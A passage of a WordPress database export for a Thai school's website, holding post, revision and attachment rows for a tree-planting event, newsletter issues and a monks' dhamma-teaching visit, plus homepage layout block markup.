-->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4-768x1024.jpg\" alt=\"\" class=\"wp-image-1366\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1368,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3-768x1024.jpg\" alt=\"\" class=\"wp-image-1368\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1367,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2-768x1024.jpg\" alt=\"\" class=\"wp-image-1367\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1370,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1-768x1024.jpg\" alt=\"\" class=\"wp-image-1370\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','\"รวมใจไทย ปลูกต้นไม้ เพื่อแผ่นดิน\"','','inherit','closed','closed','','1359-revision-v1','','','2025-06-13 12:05:56','2025-06-13 05:05:56','',1359,'http://pakhaeng.ssk.in.th/?p=1371',0,'revision','',0),
(1372,1,'2025-06-13 12:11:11','2025-06-13 05:11:11','<!-- wp:image {\"id\":1373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-724x1024.jpg\" alt=\"\" class=\"wp-image-1373\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-35','','','2025-06-13 12:11:13','2025-06-13 05:11:13','',0,'http://pakhaeng.ssk.in.th/?p=1372',0,'post','',0),
(1373,1,'2025-06-13 12:07:49','2025-06-13 05:07:49','','สีฟ้า สีส้ม ทันสมัย ข่าวประชาสัมพันธ์ การประชุมองค์กรท้องถิ่น จดหมายข่าว','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%9f%e0%b9%89%e0%b8%b2-%e0%b8%aa%e0%b8%b5%e0%b8%aa%e0%b9%89%e0%b8%a1-%e0%b8%97%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%a2-%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7-2','','','2025-06-13 12:07:49','2025-06-13 05:07:49','',1372,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1.jpg',0,'attachment','image/jpeg',0),
(1374,1,'2025-06-13 12:11:11','2025-06-13 05:11:11','<!-- wp:image {\"id\":1373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-724x1024.jpg\" alt=\"\" class=\"wp-image-1373\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','inherit','closed','closed','','1372-revision-v1','','','2025-06-13 12:11:11','2025-06-13 05:11:11','',1372,'http://pakhaeng.ssk.in.th/?p=1374',0,'revision','',0),
(1375,1,'2025-06-13 12:13:01','2025-06-13 05:13:01','<!-- wp:image {\"id\":1376,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/6-68-724x1024.png\" alt=\"\" class=\"wp-image-1376\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-36','','','2025-06-13 12:13:03','2025-06-13 05:13:03','',0,'http://pakhaeng.ssk.in.th/?p=1375',0,'post','',0),
(1376,1,'2025-06-13 12:12:27','2025-06-13 05:12:27','','6-68','','inherit','','closed','','6-68','','','2025-06-13 12:12:27','2025-06-13 05:12:27','',1375,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/6-68.png',0,'attachment','image/png',0),
(1377,1,'2025-06-13 12:12:46','2025-06-13 05:12:46','','6-68','','inherit','','closed','','6-68-2','','','2025-06-13 12:12:46','2025-06-13 05:12:46','',1375,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/6-68-1.png',0,'attachment','image/png',0),
(1378,1,'2025-06-13 12:13:01','2025-06-13 05:13:01','<!-- wp:image {\"id\":1376,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/6-68-724x1024.png\" alt=\"\" class=\"wp-image-1376\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์','','inherit','closed','closed','','1375-revision-v1','','','2025-06-13 12:13:01','2025-06-13 05:13:01','',1375,'http://pakhaeng.ssk.in.th/?p=1378',0,'revision','',0),
(1379,1,'2025-06-16 10:07:46','2025-06-16 03:07:46','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 13 มิถุนายน พ.ศ.2568 พระธรรมทูต จากอำเภอโนนคูณ พร้อมด้วยคณะได้จัดกิจกรรมออกให้ความรู้ เผยแผ่พระพุทธศาสนา และปลูกจิตสำนึกเกี่ยวกับการทำความดี ละเว้นจากการทำความชั่วทั้งปวง ให้กับนักเรียนโรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1384,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19489_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1384\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1380,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19484_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1380\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1385,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19485_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1385\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1381,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19486_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1381\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1383,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19487_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1383\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1382,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19488_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1382\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1386,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308365_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1386\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1387,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308366_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1387\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1389,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308367_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1389\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1388,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308369-578x1024.jpg\" alt=\"\" class=\"wp-image-1388\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','อบรมธรรมะ จากพระธรรมทูต อำเภอโนนคูณ','','publish','closed','closed','','%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%b0-%e0%b8%88%e0%b8%b2%e0%b8%81%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%97%e0%b8%b9%e0%b8%95','','','2025-06-16 10:07:48','2025-06-16 03:07:48','',0,'http://pakhaeng.ssk.in.th/?p=1379',0,'post','',0),
(1380,1,'2025-06-16 10:07:16','2025-06-16 03:07:16','','19484_0','','inherit','','closed','','19484_0','','','2025-06-16 10:07:16','2025-06-16 03:07:16','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19484_0.jpg',0,'attachment','image/jpeg',0),
(1381,1,'2025-06-16 10:07:16','2025-06-16 03:07:16','','19486_0','','inherit','','closed','','19486_0','','','2025-06-16 10:07:16','2025-06-16 03:07:16','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19486_0.jpg',0,'attachment','image/jpeg',0),
(1382,1,'2025-06-16 10:07:16','2025-06-16 03:07:16','','19488_0','','inherit','','closed','','19488_0','','','2025-06-16 10:07:16','2025-06-16 03:07:16','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19488_0.jpg',0,'attachment','image/jpeg',0),
(1383,1,'2025-06-16 10:07:16','2025-06-16 03:07:16','','19487_0','','inherit','','closed','','19487_0','','','2025-06-16 10:07:16','2025-06-16 03:07:16','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19487_0.jpg',0,'attachment','image/jpeg',0),
(1384,1,'2025-06-16 10:07:16','2025-06-16 03:07:16','','19489_0','','inherit','','closed','','19489_0','','','2025-06-16 10:07:16','2025-06-16 03:07:16','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19489_0.jpg',0,'attachment','image/jpeg',0),
(1385,1,'2025-06-16 10:07:16','2025-06-16 03:07:16','','19485_0','','inherit','','closed','','19485_0','','','2025-06-16 10:07:16','2025-06-16 03:07:16','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19485_0.jpg',0,'attachment','image/jpeg',0),
(1386,1,'2025-06-16 10:07:21','2025-06-16 03:07:21','','308365_0','','inherit','','closed','','308365_0','','','2025-06-16 10:07:21','2025-06-16 03:07:21','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308365_0.jpg',0,'attachment','image/jpeg',0),
(1387,1,'2025-06-16 10:07:21','2025-06-16 03:07:21','','308366_0','','inherit','','closed','','308366_0','','','2025-06-16 10:07:21','2025-06-16 03:07:21','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308366_0.jpg',0,'attachment','image/jpeg',0),
(1388,1,'2025-06-16 10:07:21','2025-06-16 03:07:21','','308369','','inherit','','closed','','308369','','','2025-06-16 10:07:21','2025-06-16 03:07:21','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308369.jpg',0,'attachment','image/jpeg',0),
(1389,1,'2025-06-16 10:07:21','2025-06-16 03:07:21','','308367_0','','inherit','','closed','','308367_0','','','2025-06-16 10:07:21','2025-06-16 03:07:21','',1379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308367_0.jpg',0,'attachment','image/jpeg',0),
(1390,1,'2025-06-16 10:07:46','2025-06-16 03:07:46','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 13 มิถุนายน พ.ศ.2568 พระธรรมทูต จากอำเภอโนนคูณ พร้อมด้วยคณะได้จัดกิจกรรมออกให้ความรู้ เผยแผ่พระพุทธศาสนา และปลูกจิตสำนึกเกี่ยวกับการทำความดี ละเว้นจากการทำความชั่วทั้งปวง ให้กับนักเรียนโรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1384,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19489_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1384\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1380,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19484_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1380\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1385,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19485_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1385\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1381,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19486_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1381\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1383,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19487_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1383\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1382,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/19488_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1382\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1386,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308365_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1386\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1387,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308366_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1387\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1389,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308367_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1389\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1388,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/308369-578x1024.jpg\" alt=\"\" class=\"wp-image-1388\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','อบรมธรรมะ จากพระธรรมทูต อำเภอโนนคูณ','','inherit','closed','closed','','1379-revision-v1','','','2025-06-16 10:07:46','2025-06-16 03:07:46','',1379,'http://pakhaeng.ssk.in.th/?p=1390',0,'revision','',0),
(1391,1,'2025-06-16 10:09:04','2025-06-16 03:09:04','<!-- wp:image {\"id\":1392,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/7-68-724x1024.png\" alt=\"\" class=\"wp-image-1392\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ ปีที่ 3 ฉบับที่ 7 ลงวันที่ 13 มิถุนายน 2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%9b%e0%b8%b5%e0%b8%97','','','2025-06-16 10:09:06','2025-06-16 03:09:06','',0,'http://pakhaeng.ssk.in.th/?p=1391',0,'post','',0),
(1392,1,'2025-06-16 10:08:48','2025-06-16 03:08:48','','7-68','','inherit','','closed','','7-68','','','2025-06-16 10:08:48','2025-06-16 03:08:48','',1391,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/7-68.png',0,'attachment','image/png',0),
(1393,1,'2025-06-16 10:09:04','2025-06-16 03:09:04','<!-- wp:image {\"id\":1392,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/7-68-724x1024.png\" alt=\"\" class=\"wp-image-1392\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ ปีที่ 3 ฉบับที่ 7 ลงวันที่ 13 มิถุนายน 2568','','inherit','closed','closed','','1391-revision-v1','','','2025-06-16 10:09:04','2025-06-16 03:09:04','',1391,'http://pakhaeng.ssk.in.th/?p=1393',0,'revision','',0),
(1395,1,'2025-06-16 10:32:26','2025-06-16 03:32:26','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist 